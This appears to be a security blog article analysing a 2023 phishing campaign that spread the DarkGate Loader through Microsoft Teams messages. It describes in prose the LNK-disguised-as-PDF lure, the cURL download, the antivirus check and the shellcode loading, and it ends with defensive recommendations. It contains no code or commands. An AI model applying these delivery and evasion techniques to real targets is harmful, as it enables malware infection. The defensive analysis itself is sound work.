In the ever-evolving world of cyber security, the late August of 2023 marked the emergence of a noteworthy phishing campaign leveraging Microsoft Teams messages. This campaign targeted various organizations through malicious attachments delivering the DarkGate Loader malware. Through this article, we aim to provide a detailed analysis of the technical facets of this attack, explore its connections to previous incidents, and offer informed recommendations for securing Microsoft Teams against similar threats.

Dissecting the DarkGate Malware Phishing Campaign

At the onset of the campaign, attackers compromised external Office 365 accounts to distribute phishing messages via Microsoft Teams. These messages lured users into downloading a ZIP file which was titled “Changes to the vacation schedule”. This seemingly innocent attachment masked a sinister intent, as clicking on it initiated a download process from a SharePoint URL which harboured a malicious LNK file disguised as a PDF document.

What followed was a complex sequence of events. To elucidate, let’s break down the subsequent stages of this malicious attack into detailed sections.

Phase 1: Initiating the Malware Download

Upon clicking the disguised attachment, a sophisticated infection chain triggered, spearheaded by a malicious VBScript identified by Truesec researchers. This script functioned as the precursor to the DarkGate Loader infiltration. It ingeniously utilized Windows cURL to facilitate the malware download, thereby circumventing detection mechanisms often found in corporate security systems. This phase embodies the initial step in the campaign, paving the way for further exploitation.

Phase 2: Employing Evasion Tactics

The script in question arrived pre-compiled, a tactic deployed to obscure its malicious code. This was achieved using “magic bytes” associated with AutoIT scripts, a programming language designed to automate the Windows GUI and general scripting. Consequently, the script undertook a preliminary check for the presence of Sophos antivirus software, a reputable protective layer in cybersecurity. Based on the results of this check, the script adapted its behavior, indicating a high level of sophistication in its evasion tactics.

Phase 3: Launching the Shellcode

After adapting to the security environment, the script proceeded to launch the shellcode. This portion of the code utilized “stacked strings” to craft the DarkGate Windows executable, subsequently loading it into the system memory. This tactic represents a crucial phase in the infiltration process, demonstrating the malware’s capability to integrate deeply within the system.

Connecting Past Incidents and Microsoft’s Standpoint

Remarkably, this is not an isolated event. A growing trend of exploiting compromised Microsoft Teams accounts for disseminating malicious attachments has been documented. This method of attack was highlighted previously in a June 2023 report published by Jumpsec. Despite this, it seems Microsoft has yet to address this escalating concern, instead advising users to employ security measures such as implementing narrow-scoped allow-lists and restricting external access unless absolutely required. Furthermore, a tool facilitating Microsoft Teams phishing attacks was released in July 2023 by a Red Teamer, although it seems to remain unconnected to the current campaign.

Recommendations for Safeguarding Microsoft Teams

In the face of these increasing threats, it is paramount for organizations to adopt proactive strategies to protect their Microsoft Teams environments. A few recommended approaches include narrowing the scope of allow-lists to limit potential threats and disabling unnecessary external access, thus creating a more secure operational sphere.

In conclusion, the DarkGate malware phishing campaign presents a significant threat to organizational security. By understanding its complex workings and adopting suggested protective measures, it is possible to build a fortified line of defense against potential future attacks, fostering a safer digital environment for all.

Processing…
Success! You're on the list.

Also Read: